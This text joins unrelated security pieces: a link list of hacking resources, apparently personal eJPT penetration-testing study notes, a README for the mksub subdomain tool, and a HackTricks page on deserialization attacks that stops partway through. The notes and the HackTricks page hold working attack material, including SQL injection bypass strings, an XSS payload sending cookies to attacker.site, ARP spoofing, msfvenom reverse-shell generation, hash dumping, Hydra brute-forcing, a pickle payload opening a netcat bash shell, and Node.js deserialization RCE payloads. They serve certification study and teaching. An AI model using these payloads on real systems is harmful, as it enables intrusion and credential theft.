http://www.xss-payloads.com/ https://github.com/payloadbox/sql-injection-payload-list https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet ---------------------------------------------------------------------------- #### Social Engineering https://support.rackspace.com/how-to/email-spoofing-best-practices/ http://hackwithbrain.blogspot.com/2016/01/email-spoofing-tutorial.html https://www.trustzone.com/how-to-produce-a-phishing-email-in-5-minutes/ https://www.youtube.com/watch?v=iPfL6n9TzOE (Email Spoofing) https://www.youtube.com/watch?v=FH3sxFl-4is (Email Intercept) https://dminc.com/blog/social-engineering-in-advanced-persistent-threat/ https://www.kaspersky.com/resource-center/definitions/advanced-persistent-threats https://www.darkreading.com/vulnerabilities-and-threats/social-engineering-leads-apt-attack-vectors/d/d-id/1100142 https://digitalguardian.com/blog/social-engineering-attacks-common-techniques-how-prevent-attack https://www.proofpoint.com/us/threat-reference/advanced-persistent-threat https://www.computerweekly.com/feature/How-to-combat-advanced-persistent-threats-APT-strategies-to-protect-your-organisation ---------------------------------------------------------------------------- #### Hardware Hacking https://www.youtube.com/watch?v=YjQhS_95t7s https://null-byte.wonderhowto.com/how-to/make-your-own-bad-usb-0165419/ https://devcraze.com/tutorials/cyber-security/create-a-rubber-ducky-using-arduino/ https://hackaday.com/tag/badusb/ https://medium.com/@rokolabrovic/bad-arduino-leonardo-16a712faebcb ---------------------------------------------------------------------------- #### Labs https://pentesterlab.com/ https://owasp.org/projects/ https://www.hackthebox.eu/ https://www.vulnhub.com/ https://tryhackme.com/ https://www.offensive-security.com/labs/ ---------------------------------------------------------------------------- #### Course Platforms https://www.elearnsecurity.com/ https://www.pentesteracademy.com/ https://www.offensive-security.com/ https://cybrary.it/ https://www.udemy.com/ https://www.pluralsight.com/ https://www.udemy.com/ https://cybrary.it/ ---------------------------------------------------------------------------- #### Youtube Channels https://www.youtube.com/channel/UCxHzA-Z97sjfK3OISjkbMCQ (RoadSec) https://www.youtube.com/channel/UC2QgCedRNj_tLDrGWSM3GsQ (Mindthesec) https://www.youtube.com/channel/UCz1PsqIhim7PUqQfuXmD-Bw (Hackaflag) https://www.youtube.com/user/BlackHatOfficialYT (Blackhat) https://www.youtube.com/channel/UCqGONXW1ORgz5Y4qK-0JdkQ (Joe Grand) https://www.youtube.com/user/DEFCONConference (Defcon) https://www.youtube.com/channel/UC4dxXZQq-ofAadUWbqhoceQ (DeviantOllam) https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ (Hak5) https://www.youtube.com/channel/UCimS6P854cQ23j6c_xst7EQ (Hacker Warehouse) https://www.youtube.com/channel/UCe8j61ABYDuPTdtjItD2veA (OWASP) https://www.youtube.com/channel/UC42VsoDtra5hMiXZSsD6eGg/featured (The Modern Rogue) https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw (Stack Mashing) https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w (Live Overflow) https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A (PwnFunction) https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA (IppSec) https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A (Murmus CTF) https://www.youtube.com/channel/UCND1KVdVt8A580SjdaS4cZg (Colin Hardy) https://www.youtube.com/user/GynvaelEN (GynvaelEN) https://www.youtube.com/channel/UCBcljXmuXPok9kT_VGA3adg (Robert Baruch) https://www.youtube.com/channel/UCGISJ8ZHkmIv1CaoHovK-Xw (/DEV/NULL) https://www.youtube.com/user/RootOfTheNull (John Hammond) https://www.youtube.com/channel/UCDbNNYUME_pgocqarSjfNGw (Kacper) https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw (The Cyber Mentor) https://www.youtube.com/channel/UCdNLW93OyL4lTav1pbKbyaQ (Mentorable) https://www.youtube.com/channel/UCMACXuWd2w6_IEGog744UaA (Derek Rook) https://www.youtube.com/channel/UCFvueUEWRfQ9qT9UmHCw_og (Prof. Joas Antonio) https://www.youtube.com/user/ricardolongatto (Ricardo Longatto) https://www.youtube.com/user/daybsonbruno (XTREME Security) https://www.youtube.com/user/eduardoamaral07 (Facil Tech) https://www.youtube.com/channel/UC70YG2WHVxlOJRng4v-CIFQ (Gabriel Pato) https://www.youtube.com/user/Diolinux (Diolinux) https://www.youtube.com/user/greatscottlab (Great Scott!) https://www.youtube.com/user/esecuritytv (eSecurity) https://www.youtube.com/channel/UCzWPaANpPISEE_xvJm8lqHA (Cybrary) https://www.youtube.com/user/DanielDonda (Daniel Donda) https://www.youtube.com/channel/UCQN2DsjnYH60SFBIA6IkNwg (STOK) https://www.youtube.com/user/ZetaTwo (Calle Svensson) https://www.youtube.com/channel/UCNKUSu4TPk979JzMeKDXiwQ (Georgia Wedman) https://www.youtube.com/channel/UCqDLY9WFoJWqrhycW8cbv1Q (Manoel T) https://www.youtube.com/channel/UCNRM4GH-SD85WCSqeSb4xUA (Bug Bounty Public Disclousere) https://www.youtube.com/channel/UCwTH3RkRCIE35RJ16Nh8V8Q (Kindred) https://www.youtube.com/channel/UCySphP8k4rv7Jf-7v3baWIA(Vinicius Vieira) https://www.youtube.com/channel/UCVImyGhRATNFGPmJfxaq1dw (Bsides) https://www.youtube.com/user/Wraiith75 (Wraiith) https://www.youtube.com/user/genxweb (Michael LaSalvia) https://www.youtube.com/channel/UCi8P9S-PW7AF71g8Pi0W6Jw (AcadiTI) https://www.youtube.com/channel/UCuQ8zW9VmVyml7KytSqJDzg (Mente Binรกria) https://www.youtube.com/channel/UC_JW_5_3XnGR6IdqKmZD7Rg (Cryptoroot) https://www.youtube.com/user/adsecf (Guia Anรดnima) https://www.youtube.com/channel/UCXHBFtUcbhIssuuXXud2WcQ (Helvio Junior) https://www.youtube.com/user/securitycast (Security Cast) https://www.youtube.com/channel/UCcYYP7JizTd24W9Mr7FIhxw (Hack N' Roll Academy) ---------------------------------------------------------------------------- #### Blogs and Notices https://thehackernews.com/ https://www.hackread.com/ https://blog.eccouncil.org/ https://acaditi.com.br/blog/ https://www.cisoadvisor.com.br/ https://mundohacker.net.br/ https://olhardigital.com.br/ https://www.digitalhealth.net/ https://www.tecmundo.com.br/ https://www.forbes.com/ https://www.bbc.com/ https://www.cisomag.com/ https://cio.economictimes.indiatimes.com/ https://www.kaspersky.com.br/blog/ https://www.tripwire.com/ https://blog.trendmicro.com.br/ https://www.bleepingcomputer.com/ https://thehack.com.br/ https://cyware.com/cyber-security-news-articles https://threatpost.com/ https://exchange.xforce.ibmcloud.com/ https://www.scmagazine.com/home/security-news/ https://www.infosecurity-magazine.com/news/ https://www.securitymagazine.com/topics/2236-cyber-security-news https://www.darkreading.com/ http://hakin9.org/ ---------------------------------------------------------------------------- #### My Articles https://www.linkedin.com/pulse/base-para-ingressar-mercado-de-seguran%C3%A7a-da-joas-antonio-dos-santos/ (A base para ingressar no mercado de seguranรงa da informaรงรฃo) https://www.linkedin.com/pulse/iniciando-e-aprimorando-sua-carreira-na-%C3%A1rea-de-soc-dos-santos/ - Iniciando e aprimorando sua carreira na รกrea de SOC (Security Operation Center) https://www.linkedin.com/pulse/sou-iniciante-na-%C3%A1rea-de-seguran%C3%A7a-da-informa%C3%A7%C3%A3o-por-onde-dos-santos/ (Sou iniciante na รกrea de seguranรงa da informaรงรฃo, por onde eu devo comeรงar?) https://www.linkedin.com/pulse/o-colapso-do-mercado-de-seguran%C3%A7a-da-informa%C3%A7%C3%A3o-dos-santos/ (O Colapso do Mercado de Seguranรงa da Informaรงรฃo?) https://www.linkedin.com/pulse/como-se-qualificar-para-novas-vagas-de-seguran%C3%A7a-da-que-dos-santos/ (Como se qualificar para as novas vagas de seguranรงa da informaรงรฃo que estรฃo abrindo?) https://www.linkedin.com/pulse/os-requisitos-para-trabalhar-mercado-de-seguran%C3%A7a-da-dos-santos/ (Os requisitos para trabalhar no mercado de seguranรงa da informaรงรฃo) https://www.linkedin.com/pulse/aprimorando-seu-conhecimento-para-se-tornar-um-em-da-dos-santos/ (Aprimorando seu conhecimento para se tornar um Especialista em Seguranรงa da Informaรงรฃo) https://www.linkedin.com/pulse/forma%C3%A7%C3%A3o-completa-para-se-tornar-um-cyber-security-dos-santos/ (Formaรงรฃo completa para se tornar um Cyber Security Analyst) https://www.linkedin.com/pulse/se-tornando-um-offensive-defensive-security-joas-antonio-dos-santos/ (Se tornando um Engenheiro de Seguranรงa Defensiva e Ofensiva) https://www.linkedin.com/pulse/aprimore-agora-suas-habilidades-t%C3%A9cnicas-na-%C3%A1rea-de-da-dos-santos/ (Aprimore agora suas habilidades tecnicas na รกrea de seguranรงa da informaรงรฃl) https://www.linkedin.com/pulse/como-se-tornar-um-mestre-jedi-ctf-joas-antonio-dos-santos/ (Como se tornar um Mestre Jedi no CTF) https://www.linkedin.com/pulse/ser%C3%A1-que-realmente-vale-pena-gastar-dinheiro-com-na-%C3%A1rea-dos-santos/ (Vale a pena gastar dinheiro com certificaรงรฃo?) https://www.linkedin.com/pulse/qual-caminho-trilhar-na-%C3%A1rea-de-seguran%C3%A7a-da-joas-antonio-dos-santos/ (Qual caminho trilhar na รกrea de seguranรงa?) https://www.linkedin.com/pulse/aonde-eu-posso-estudar-seguran%C3%A7a-da-informa%C3%A7%C3%A3o-nessa-dos-santos/ (Aonde eu posso estudar seguranรงa da informaรงรฃo?) https://www.linkedin.com/pulse/como-estudar-e-desenvolver-suas-habilidades-em-pt2-dos-santos/ (Como estudar e desenvolver suas habilidades em seguranรงa da informaรงรฃo PT2) https://www.linkedin.com/pulse/como-ser-um-%C3%B3timo-profissional-de-ti-joas-antonio-dos-santos/ (Como ser um รณtimo profissional de TI) https://www.linkedin.com/pulse/desenvolvendo-o-autodidatismo-na-%C3%A1rea-de-seguran%C3%A7a-da-dos-santos/ (Desenvolvendo o autodidatismo na รกrea de seguranรงa da informaรงรฃo) https://www.linkedin.com/pulse/qualquer-um-pode-trabalhar-com-seguran%C3%A7a-da-joas-antonio-dos-santos/ (Qualquer um pode trabalhar com seguranรงa da informaรงรฃo) https://www.linkedin.com/pulse/guia-b%C3%A1sico-sobre-soc-security-operation-center-dos-santos/ (Guia bรกsico sobre SOC - Security Operation Center) https://www.linkedin.com/pulse/como-estudar-para-certifica%C3%A7%C3%B5es-sem-dinheiro-pt1-dos-santos/ (Como estudar para certificaรงรตes sem dinheiro PT1) https://www.linkedin.com/pulse/construa-seu-laborat%C3%B3rio-de-seguran%C3%A7a-da-informa%C3%A7%C3%A3o-e-dos-santos/ (Construa seu laboratorio de seguranรงa da informaรงรฃo) https://www.linkedin.com/pulse/fundamentos-qual-real-necessidade-de-aprender-joas-antonio-dos-santos/ (Fundamentos qual a real necessidade de aprender?) https://www.linkedin.com/pulse/como-ingressar-mercado-de-seguran%C3%A7a-da-informa%C3%A7%C3%A3o-dos-santos/ (Como ingressar no mercado de seguranรงa da informaรงรฃo?) https://www.linkedin.com/pulse/se-tornando-um-pentester-ou-hacker-n%C3%ADvel-elliot-dos-santos/ (Se tornando um Hacker ou PenTest nivel Elliot) https://www.linkedin.com/pulse/desenvolvendo-suas-habilidades-em-seguran%C3%A7a-da-dos-santos/ (Desenvolvendo suas habilidades em seguranรงa da informaรงรฃo) https://www.linkedin.com/pulse/expandindo-sua-mente-para-se-tornar-um-mestre-na-arte-dos-santos/ (Expandindo sua mente para se tornar um mestre na arte de PenTest) https://www.linkedin.com/pulse/como-ser-um-mestre-jedi-na-%C3%A1rea-de-seguran%C3%A7a-da-dos-santos/ (Como ser um mestre jedi na รกrea de seguranรงa da informaรงรฃo) https://www.linkedin.com/pulse/como-aproveitar-o-hack-box-para-seu-desenvolvimento-dos-santos/ (Como aproveitar o Hack the Box para seu desenvolvimento pessoal?) https://www.linkedin.com/pulse/estou-perdido-por-onde-come%C3%A7ar-na-%C3%A1rea-de-seguran%C3%A7a-da-dos-santos/ (Estou perdido! Por onde comeรงar na รกrea de seguranรงa) https://www.linkedin.com/pulse/pentest-z3r0-h3r0-1-joas-antonio-dos-santos/ (PenTest Z3R0 TO H3R0) https://www.linkedin.com/pulse/como-se-tornar-um-elliot-alderson-ctf-joas-antonio-dos-santos/ (Como se tornar um elliot alderson no CTF https://www.linkedin.com/pulse/entenda-o-ataque-do-primeiro-epis%C3%B3dio-de-mr-robot-dos-santos-/ (Entenda o primeiro ataque da sรฉrie Mr. Robot - Bรดnus) https://www.linkedin.com/pulse/tudo-sobre-profiss%C3%A3o-analista-de-seguran%C3%A7a-da-dos-santos-/ (Tudo sobre a profissรฃo de analista de seguranรงa da informaรงรฃo)
# eJPT Notes - eLearnSecurity Junior Penetration Tester Certificate Notes ![Cert Header](certHeader.png) ### NOTE - **I am not - affiliated with eLearnSecurity in any way and these notes do not guarantee that you pass.** - Replace 10.10.10.2 with the proper IP based on your situation ## What is this? - The notes below are **personal** notes I took while studying for eLearnSecurity's eJPT certificate in their Penetration Testing Student (PTS) course. - I passed on the first attempt in great part due to the labs and taking notes throughout. ## What this includes: - Condensed Notes (below this section): Short notes with snippets in case you forget a command/ concept - Full Notes: This includes explanations/ tidbits from the non-lab portions and can possibly help with general interview questions. ---- # Condensed Notes: ## Enumeration: ### Ping Sweep: - fping: `fping -a -g {IP RANGE} 2>/dev/null` - EX: `fping -a -g 10.10.10.0/8 2>/dev/null` - Nmap Ping Sweep: ``` nmap -sn 10.10.10.0/8 | grep -oP '(?<=Nmap scan report for )[^ ]*' ``` ### Nmap - Full Scan (All Ports, Syn, Scripts, Version, Speed): ``` nmap -Pn -T4 --open -sS -sC -sV --min-rate=1000 --max-retries=3 -p- -oN scanReportForHost2 10.10.10.2 ``` - Replace `-sS` with `-sT` for full TCP - Quick Scan (WARNING NOT ALL PORTS): ``` nmap -sC -sV 10.10.10.2 ``` - IP Range: ``` nmap -sC -sV 10.10.10.2-33 ``` - Select IPs: ``` nmap -sC -sV 10.10.10.2,3,6,9 ``` - Vulnerability Scan for specific services: ``` nmap --script suspectedVulnScript(s)Here -p {PORT(s)} 10.10.10.2 ``` - Shares Enumeration: ```r nbstat -A 10.10.10.2 nmblookup -A 10.10.10.2 smbclient //10.10.10.2/share -N # mounts share smbclient -L //10.10.10.2 -N # lists shares and omits NetBIOS asking for a pss enum4linux -a 10.10.10.2 ``` ### Banner Grabbing - Netcat format: `nc {Target IP} {Port}` - Netcat (HTTP Only): ``` nc 10.10.10.2 80 HEAD / HTTP/1.0 #NOTE: PUT TWO EMPTY LINES AFTER! # EMPTY LINE HERE # EMPTY LINE HERE AGAIN ``` - Netcat (See all available verb OPTIONS): ``` nc 10.10.10.2 OPTIONS / HTTP/1.0 ``` - OpenSSL (HTTPS) ``` opnessl s_client -connect 10.10.10.2:443 HEAD / HTTP/1.0 ``` ### Wireshark Snippets ``` request.method == "POST" http & ip.src == 192.168.0.1 tcp.port == xx tcp.srcport == xx http.request ``` - After capturing/ opening traffic: - Follow -> TCP Stream ## Web Enumeration ### Web Scanning: - Nikto - General Scan: ``` nikto -h http://10.10.10.2/ ``` ### Directory Traversal: - gobuster (recommended): ``` gobuster dir -u http://10.10.10.2/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt ``` - gobuster with auth and file extensions: ``` gobuster dir -u http://10.10.10.2/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -U admin -x /,php,txt,bak,old,html,xxx ``` - You might want to dial down the extensions `-x php,txt` based on the target you're after. In this case, we know the password for the user `-U admin` - dirb: ``` dirb http://10.10.10.2/ /usr/share/wordlists/dirb/common.txt ``` - dirb with auth: ``` http://targetsite.site/ -u "admin:password" ``` ## Routing/ Pivoting: - `route -n` (linux) - Clean routing table. Definitely use this when setting up a route, makes seeing the Destination and Gateway more clear! - `arp -a` (linux/ windows) - Show you the ARP table, gateway, and iface - `ip route` (linux) - Show you the routing setup you have - Add Route/ Pivot: - `ip route add` {CONNECT TO THIS NETWORK} `via` {FROM THIS IP} - `ip route add 10.10.10.0/8 via 10.10.10.99` --- ## Web Exploitation ### SQL Injection (SQLi): - Basic union injection (Manual): ``` xxxx' UNION SELECT null; -- - ``` - Basic login bypass (Manual): ``` ' or 1=1; -- -' ``` - SQLMap with a parameter: ```bash sqlmap -u 'http://vuln.site/item.php?id=203' -p id --technique=U # Enum 'id' parameter and use the UNION technique sqlmap -u http://10.10.10.2/item.php?id=203 --tables # Shows us all tables in the DB ``` - SQLMap dump: ```bash sqlmap -u 'http://vuln.site/view.php?id=203' --dump # has potential to take down servers in IRL situations ``` ### Cross-Site Scripting (XSS): - Find a vulnerable input field: `<script>alert('Fight On!')</script>` - Steal cookie (helpful with stored-xss): ```js <script\> var i \= new Image(); i.src\="http://attacker.site/log.php?q="+document.cookie; </script\> ``` --- ## Host Exploitation ### ARP Spoofing ```py echo 1 > /proc/sys/net/ipv4/ip_forward # So once traffic reaches us, proceeds to the vicitm arpspoof -i tap0 -t 10.10.10.2 -r 10.10.10.6 ``` ### Metasploit - Basic Commands: ```r search xxxx # EX: search tomcat use xxxx # EX: use 1... or use itemNameHere set xxxx # Configure target IP and whatever required settings required for the module/ exploit options, show options, advanced options xxxx #Shows you all options for the payload/ module you have set show payloads # In case you need to switch to a bind shell in cases where a revshell or go all out for a meterpreter shell select payload xxxx # To actually switch to whatever payload you want ``` - Generate a payload: ```bash msfvenom -p php/reverse_php lhost={Attacker IP} lport=443 -o revShell.php # Basic php reverse shell msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf # Linux reverse shell ``` - Upgrade to a meterpreter shell: ```bash use post/multi/manager/shell_to_meterpreter ``` - Meterpreter - Helpful Commands: ```bash background session -l # Lists your open sessions sessions -i 3 # Interact with/ open/ enter session 3 getsystem # PrivEsc for Windows sysinfo, ifconfig, route, getuid # Internal Enumeration download thisFile.txt /in/my/directory/here hashdump # Dumps Windows SAM password hashes ``` ### Netcat Listener ``` nc -nvlp 8888 # Listening on port 8888 ``` ### Passwords - Prepare a file for John the Ripper to crack: ``` unshadow passwd shadow > crackThisPls ``` - Crack the passwords with John: ``` john --wordlist=/my/wordlist/is/here.txt crackThisPls ``` - Brute-force with Hydra: - Change ssh/ telnet to the service you are targeting ```r hydra -L usersList.txt -P passList.txt -t 10 10.10.10.2 ssh -s 22 hydra -L usersList -P passList telnet://10.10.10.2 -V # verbose so you see real-time when a password is found ``` --- ## Last Minute Reminders - Once you compromise a box, cat the /etc/hosts file or it's equivalent to find other hosts. This was crucial in the labs. - You MUST do a full port scan, do not hurry, the labs had some ports without a full scan you would have missed. - T5 speed on nmap omits some ports for me, your experience may vary, I think sticking to T4 or less is wise. - For web: After you get some creds, try to pipe them into gobuster for an authenticated traversal. - If nmap's service version scan (-sV) is of no help, grab the banner with nc - If SQLi does not work right away, try appending commands instead of using a boolean: - Instead of `page?id=21' or 1=1 -- -`, insert the next statement directly, `page?id=21 AND SELECT ...` - Let gobuster run for a while, and run dirb as well and have it run for a while too, in case one of them does not catch a directory. - Again, seriously do not hurry and miss things out. - Enumerate! Enumerate! Enumerate! Everything. Every directory, file, if you get stuck. --- ## Helpful Cheatsheets - SQL Union Injections (If you want to do the injection manually, it's actually fun!): https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635 - Basic SQL Injection for Authentication Bypass: https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/\ - TTY Shells: https://netsec.ws/?p=337
<h1 align="center">mksub <a href="https://twitter.com/intent/tweet?text=mksub%20-%20Generate%20tens%20of%20thousands%20of%20subdomain%20combinations%20in%20a%20matter%20of%20seconds%0Ahttps%3A%2F%2Fgithub.com%2Ftrickest%2Fmksub&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Tweet--lightgrey?logo=twitter&style=social" alt="Tweet" height="20"/></a></h1> <h3 align="center">Generate tens of thousands of subdomain combinations in a matter of seconds</h3> ![mksub](mksub.png "mksub") Read a wordlist file and generate subdomain combinations for a given domain or list of domains. Input from the wordlist file is lowercased and only unique words are processed. Additionally, wordlist can be filtered using regex. When you use mksub's `-l` parameter, it will generate all subdomain combinations up to the specified level, including all lower levels, using words from the wordlist. For instance, with `-l 2`, it will generate `len(permutation_list)^2 + len(permutation_list)` results, which is: - 30 combinations for a 5-word wordlist. - 10100 combinations for a 100-word wordlist. - 250500 combinations for a 500-word wordlist. # Installation ## Binary Binaries are available in the [latest release](https://github.com/trickest/mksub/releases/latest). ## Docker ``` docker run quay.io/trickest/mksub ``` ## From source ``` go install github.com/trickest/mksub@latest ``` # Usage ``` -d string Input domain -df string Input domain file, one domain per line -l int Subdomain level to generate (default 1) -o string Output file (stdout will be used when omitted) -r string Regex to filter words from wordlist file -silent Skip writing generated subdomains to stdout (faster) (default true) -t int Number of threads for every subdomain level (default 100) -w string Wordlist file ``` # Example ### wordlist.txt ``` dev DEV * foo.bar prod ``` ```shell script $ mksub -d example.com -l 2 -w input.txt -r "^[a-zA-Z0-9\.-_]+$" dev.example.com foo.bar.example.com prod.example.com foo.bar.dev.example.com prod.dev.example.com dev.dev.example.com dev.foo.bar.example.com foo.bar.foo.bar.example.com prod.foo.bar.example.com dev.prod.example.com foo.bar.prod.example.com prod.prod.example.com ``` ## Report Bugs / Feedback We look forward to any feedback you want to share with us or if you're stuck with a problem you can contact us at [[email protected]](mailto:[email protected]). You can also create an [Issue](https://github.com/trickest/mksub/issues/new) or pull request on the Github repository. # Where does this fit in your methodology? Mksub is an integral part of the [Inventory](https://github.com/trickest/inventory) workflow and many other workflows in the Trickest store. Sign up on [trickest.com](https://trickest.com) to get access to these workflows or build your own from scratch! [<img src="./banner.png" />](https://trickest-access.paperform.co/)
<details> <summary><strong>Support HackTricks and get benefits!</strong></summary> Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Join the** [**๐Ÿ’ฌ**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**๐Ÿฆ**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** </details> **Serialization** is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications. **Deserialization** is the reverse of that process, taking data structured from some format, and rebuilding it into an object. Today, the most popular data format for serializing data is JSON. Before that, it was XML. In many occasions you can find some code in the server side that unserialize some object given by the user.\ In this case, you can send a malicious payload to make the server side behave unexpectedly. **You should read:** [**https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html) **for learn how to attack.** # PHP Magic method used with serialization: * `__sleep` is called when an object is serialized and must be returned to array Magic method used with deserialization * `__wakeup` is called when an object is deserialized. * `__destruct` is called when PHP script end and object is destroyed. * `__toString` uses object as string but also can be used to read file or more than that based on function call inside it. ```php <?php class test { public $s = "This is a test"; public function displaystring(){ echo $this->s.'<br />'; } public function __toString() { echo '__toString method called'; } public function __construct(){ echo "__construct method called"; } public function __destruct(){ echo "__destruct method called"; } public function __wakeup(){ echo "__wakeup method called"; } public function __sleep(){ echo "__sleep method called"; return array("s"); #The "s" makes references to the public attribute } } $o = new test(); $o->displaystring(); $ser=serialize($o); echo $ser; $unser=unserialize($ser); $unser->displaystring(); /* php > $o = new test(); __construct method called__destruct method called php > $o->displaystring(); This is a test<br /> php > $ser=serialize($o); __sleep method called php > echo $ser; O:4:"test":1:{s:1:"s";s:14:"This is a test";} php > $unser=unserialize($ser); __wakeup method called__destruct method called php > $unser->displaystring(); This is a test<br /> */ ?> ``` If you look to the results you can see that the functions `__wakeup` and `__destruct` are called when the object is deserialized. Note that in several tutorials you will find that the `__toString` function is called when trying yo print some attribute, but apparently that's **not happening anymore**. [**Autoload Classes**](https://www.php.net/manual/en/language.oop5.autoload.php) may also be **dangerous**. You can read an explained **PHP example here**: [https://www.notsosecure.com/remote-code-execution-via-php-unserialize/](https://www.notsosecure.com/remote-code-execution-via-php-unserialize/), here [https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) or here [https://securitycafe.ro/2015/01/05/understanding-php-object-injection/](https://securitycafe.ro/2015/01/05/understanding-php-object-injection/) ## Serializing Referenced Values If for some reason you want to serialize a value as a **reference to another value serialized** you can: ```php <?php class AClass { public $param1; public $param2; } $o = new WeirdGreeting; $o->param1 =& $o->param22; $o->param = "PARAM"; $ser=serialize($o); ``` ## PHPGGC (ysoserial for PHP) [**PHPGCC**](https://github.com/ambionics/phpggc) can help you generating payloads to abuse PHP deserializations.\ Note than in several cases you **won't be able to find a way to abuse a deserialization in the source code** of the application but you may be able to **abuse the code of external PHP extensions.**\ So, if you can, check the `phpinfo()` of the server and **search on the internet** (an even on the **gadgets** of **PHPGCC**) some possible gadget you could abuse. ## phar:// metadata deserialization If you have found a LFI that is just reading the file and not executing the php code inside of it, for example using functions like _**file\_get\_contents(), fopen(), file() or file\_exists(), md5\_file(), filemtime() or filesize()**_**.** You can try to abuse a **deserialization** occurring when **reading** a **file** using the **phar** protocol.\ For more information read the following post: {% content-ref url="../file-inclusion/phar-deserialization.md" %} [phar-deserialization.md](../file-inclusion/phar-deserialization.md) {% endcontent-ref %} # Python ## **Pickle** When the object gets unpickle, the function _\_\_reduce\_\__ will be executed.\ When exploited, server could return an error. ```python import pickle, os, base64 class P(object): def __reduce__(self): return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",)) print(base64.b64encode(pickle.dumps(P()))) ``` For more information about escaping from **pickle jails** check: {% content-ref url="../../misc/basic-python/bypass-python-sandboxes/" %} [bypass-python-sandboxes](../../misc/basic-python/bypass-python-sandboxes/) {% endcontent-ref %} ## Yaml **&** jsonpickle The following page present the technique to **abuse an unsafe deserialization in yamls** python libraries and finishes with a tool that can be used to generate RCE deserialization payload for **Pickle, PyYAML, jsonpickle and ruamel.yaml**: {% content-ref url="python-yaml-deserialization.md" %} [python-yaml-deserialization.md](python-yaml-deserialization.md) {% endcontent-ref %} # NodeJS ## `__proto__` and `prototype` pollution If you want to learn about this technique **take a look to the following tutorial**: {% content-ref url="nodejs-proto-prototype-pollution/" %} [nodejs-proto-prototype-pollution](nodejs-proto-prototype-pollution/) {% endcontent-ref %} ## [node-serialize](https://www.npmjs.com/package/node-serialize) This library allows to serialise functions. Example: ```javascript var y = { "rce": function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}, } var serialize = require('node-serialize'); var payload_serialized = serialize.serialize(y); console.log("Serialized: \n" + payload_serialized); ``` The **serialised object** will looks like: ```bash {"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"} ``` You can see in the example that when a function is serialized the `_$$ND_FUNC$$_` flag is appended to the serialized object. Inside the file `node-serialize/lib/serialize.js` you can find the same flag and how the code is using it. ![](<../../.gitbook/assets/image (297).png>) ![](<../../.gitbook/assets/image (298).png>) As you may see in the last chunk of code, **if the flag is found** `eval` is used to deserialize the function, so basically **user input if being used inside the `eval` function**. However, **just serialising** a function **won't execute it** as it would be necessary that some part of the code is **calling `y.rce`** in our example and that's highly **unlikable**.\ Anyway, you could just **modify the serialised object** **adding some parenthesis** in order to auto execute the serialized function when the object is deserialized.\ In the next chunk of code **notice the last parenthesis** and how the `unserialize` function will automatically execute the code: ```javascript var serialize = require('node-serialize'); var test = {"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()"}; serialize.unserialize(test); ``` As it was previously indicated, this library will get the code after`_$$ND_FUNC$$_` and will **execute it** using `eval`. Therefore, in order to **auto-execute code** you can **delete the function creation** part and the last parenthesis and **just execute a JS oneliner** like in the following example: ```javascript var serialize = require('node-serialize'); var test = '{"rce":"_$$ND_FUNC$$_require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) })"}'; serialize.unserialize(test); ``` You can [**find here**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **further information** about how to exploit this vulnerability. ## [funcster](https://www.npmjs.com/package/funcster) The interesting difference here is that the **standard built-in objects are not accessible**, because they are out of scope. It means that we can execute our code, but cannot call build-in objectsโ€™ methods. So if we use `console.log()` or `require(something)`, Node returns an exception like `"ReferenceError: console is not defined"`. However, we can easily can get back access to everything because we still have access to the global context using something like `this.constructor.constructor("console.log(1111)")();`: ```javascript funcster = require("funcster"); //Serialization var test = funcster.serialize(function() { return "Hello world!" }) console.log(test) // { __js_function: 'function(){return"Hello world!"}' } //Deserialization with auto-execution var desertest1 = { __js_function: 'function(){return "Hello world!"}()' } funcster.deepDeserialize(desertest1) var desertest2 = { __js_function: 'this.constructor.constructor("console.log(1111)")()' } funcster.deepDeserialize(desertest2) var desertest3 = { __js_function: 'this.constructor.constructor("require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });")()' } funcster.deepDeserialize(desertest3) ``` **For**[ **more information read this page**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.** ## 